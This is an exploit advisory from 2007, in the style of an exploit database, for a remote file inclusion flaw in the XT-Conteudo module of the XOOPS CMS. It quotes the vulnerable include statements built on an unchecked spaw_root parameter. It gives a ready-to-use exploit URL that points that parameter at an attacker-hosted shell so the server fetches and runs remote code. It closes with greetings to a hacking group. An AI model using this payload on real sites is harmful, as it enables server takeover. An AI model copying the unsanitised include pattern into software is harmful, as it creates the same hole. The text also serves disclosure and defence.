[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
# Published : 2007-06-13
# Author : g00ns
# Previous Title : XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
# Next Title : XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
##############################################################################################
# ___ ___ _
# / _ / _ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ / __| | '_ / _ __|
# | (_| | |_| | |_| | | | __ _| | | | __/ |_
# __, |___/ ___/|_| |_|___(_)_| |_|___|__|
# __/ |
# |___/
##############################################################################################
#INFO:
#Program Title ###############################################################################
#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability
#
#Description #################################################################################
#Content module for XOOPS CMS
#
#Vuln Code ###################################################################################
#In /admin/spaw/spaw_control.class.php
# include $spaw_root.'config/spaw_control.config.php';
# include $spaw_root.'class/toolbars.class.php';
# include $spaw_root.'class/lang.class.php';
#
#Script Download ##############################################################################
#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
#
#Exploit ######################################################################################
#
#http://[ site ]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]?
#
#Credits ######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
# grumpy, and everyone else at g00ns.net
###############################################################################################
# www.Syue.com [2007-06-13]